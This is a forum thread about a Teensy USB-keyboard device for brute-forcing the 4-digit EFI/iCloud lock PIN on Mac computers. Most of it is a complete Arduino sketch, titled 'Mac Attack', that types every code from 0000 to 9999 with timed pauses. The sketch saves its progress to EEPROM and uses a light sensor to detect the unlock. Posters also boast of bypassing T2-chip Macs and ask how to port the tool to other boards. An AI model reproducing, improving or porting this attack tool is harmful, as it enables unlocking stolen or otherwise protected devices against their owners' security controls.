Teensy sketch for EFI and Icloud Bruteforce attack

By using external chip, from the Teensy I need to use just one pin as an interrupt detector with the code provided anyway. I will definitely keep you updated. In the end it will be a great device that will even work on 2018 or 2019 models that have 4 digits code only. A 6 digits code is out of question as takes about 197 days at 8 seconds code refresh window. Also I am working now on the T2 chips and I mange so far to bypass 2 computers with external boot disabled.  And so far I think I am the only one that succeed and do this models yet. Same as many years ago when I found the solution for 64mb (8.192 Mb) efi file and also the 32 ones, of course with help from others around the world that we collaborate. The best help and ideas come from US at that time.
Keep in touch.

Hello, I see that it has been more than 7 years since you shared your knowledge here on the forum, it is a very valuable collaboration. This week I started a saga to solve a project, I confess that I don't have much knowledge but I'm quite curious and I learn easily! I have a teensy 3.1 and I also have a Digispark ATtiny85 + LDR. I was very interested in your code, and I would like to know if there was a way to convert it to Digispark, as I think coding is much simpler for me just starting out. I would like to know if it is possible to implement mouse click simulation or something like that in this code, determining the time of these clicks or keyboard button presses, etc. so that the screen does not go off while testing the codes.

thaGH05T wrote: Well, nobody has given me any feedback which I find pretty strange since I made huge improvements on the code. Even though nobody is following this yet I have updated the code to do the following:

• Use 4 digit 7 segment display to show entered key and display saved/found key.
• Save last entered key into EEPROM in case of power failure and to preserve found key.
• Improved variable declarations for ease of use and customization.
• Improved LDR logic for detecting when the correct code is entered.

I will be taking a video for demonstration and instructional use soon...

/*******************************************************************************************\
| TITLE: Mac Attack                   DATE: 1/27/2016                   MODIFIED: 3/13/2016 |
| AUTHOUR: John Neal                  ALIAS: thaGH05T                                       |
| ----------------------------------------------------------------------------------------- |
| LICENCE: This work is licensed under the Creative                                         |
| Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, |
| visit http://creativecommons.org/licenses/by-sa/4.0/.                                     |
| ----------------------------------------------------------------------------------------- |
| DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it    |
| has been locked down by iCloud and the EFI passcode has not been previousely set.         |
| Additioonally it is able to detect when the correct code has been entered by using an LDR.|
| ----------------------------------------------------------------------------------------- |
| TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick        |
| variable setting. Port over to LCD for usability and versatility of configuration and     |
| attack methods.                                                                           |
\*******************************************************************************************/

/*******************************************************************************************\
| WARNING: This sketch potentially writes 10,000 times to a single address of memory.       |
| Each address can become unreadable after 100,000 writes, so it is recommended that you    |
| change saveAddress before each use.                                                       |
\*******************************************************************************************/

#include <usb_keyboard.h>
#include <SevSeg.h>
#include <EEPROM.h>

const int readPin = A0;                         // Analog read pin of the LDR.
const int ledPin = 13;                          // Led Pin, 13 on Teensy 3.1.
const char* digits = "%04d";                    // sprintf() format, %04d = 4 digits.
int bfDigits = 9999;                            // Brute force eventuallity, how hight to count.
int iterDelay = 14000;                          // Iteration delay, adjust as needed.
int lightThresh = 100;                          // Threshold of LDR, depends on resistor value.
int saveAddress = 1337;                         // Addrress where the last entered digit is stored.
byte numDigits = 4;                             // Number of digits your 7 segment display has.
byte digitPins[] = {9, 10, 11, 12};             // Digit pins, has to be in order from first to last digit.
byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8};  // Segment pins, has to be in order from A to G. Last array object should be the "." dot.
char code[4];                                   // Define the how many digits are in the code array. (change this to the count of bfGigits)
int setupDelay = 5000;                          // This is the time in millisecons that the EFI code or last number entered will be displayed as well as how -->
                                                // long the initial countdown to start brute forcing will be.
SevSeg sevseg;                                  //Instantiate a seven segment object.

void setup() {
  sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins);
  sevseg.setBrightness(10);
  keyboard_modifier_keys = 0;
  pinMode(ledPin, OUTPUT);
  //Serial.begin(9600);           // Begin serial if calibrating lightThresh.

  int efiStartTime = millis();
  int efiEndTime = efiStartTime;
  int savedEFI = readWord(saveAddress);
  while ((efiEndTime - efiStartTime) <= setupDelay){
    sevseg.setNumber(savedEFI,5);
    sevseg.refreshDisplay();
    efiEndTime = millis();
  }
}

int bfCount = 0;  //readWord(saveAddress);          // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure.
int doOnce = 1;

void loop(){
  if (doOnce == 1){
    int startTime = millis();
    int endTime = startTime;
    while ((endTime - startTime) <= setupDelay + 10){
      int delayMath = endTime / 1000 - 10;
      int modDelay = delayMath * -1;
      sevseg.setNumber(modDelay,5);
      sevseg.refreshDisplay();
      endTime = millis();
    }
    doOnce = 0;
  }
  
  int lightVal = analogRead(readPin);
  //Serial.println(lightVal);           // Print LDR value to serial to manually determine lightThresh.
  if (lightVal < lightThresh){
    if (bfCount <= bfDigits){
      sprintf(code, digits, bfCount);
      for (int i=0; i < 4; i++){
        digitalWrite(ledPin, HIGH);
        Keyboard.press(code[i]);
        delay(200);
        digitalWrite(ledPin, LOW);
        Keyboard.release(code[i]);
        delay(200);
      }
      Keyboard.press(KEY_ENTER);
      delay(200);
      Keyboard.release(KEY_ENTER);
      
      int startTime = millis();
      int endTime = startTime;
      while ((endTime - startTime) <= iterDelay){
        sevseg.setNumber(bfCount,5);
        sevseg.refreshDisplay();
        endTime = millis();
      }
      bfCount++;
      writeWord(saveAddress, bfCount);
    }
    else if (bfCount > bfDigits){
      while (1){
        for (int i=0; i < 3; i++){
          digitalWrite(ledPin, HIGH);
          delay(100);
          digitalWrite(ledPin, LOW);
          delay(100);
        }
        delay(500);
      }
    }
  }
  else if (lightVal > lightThresh){
    writeWord(saveAddress, bfCount);
    while (1){
      sevseg.setNumber(bfCount,5);
      sevseg.refreshDisplay();
    }
  }
}

void writeWord(unsigned address, unsigned value){
  EEPROM.write(address, highByte(value));
  EEPROM.write(address+1, lowByte(value));
}

unsigned readWord(unsigned address){
  return word(EEPROM.read(address), EEPROM.read(address+1));
}

For those of you who are thinking this is too good to be true, your'e welcome. For those of you who have no idea what to do with this, don't worry the tutorial is coming soon and I will be creating a shield for the Teensy xx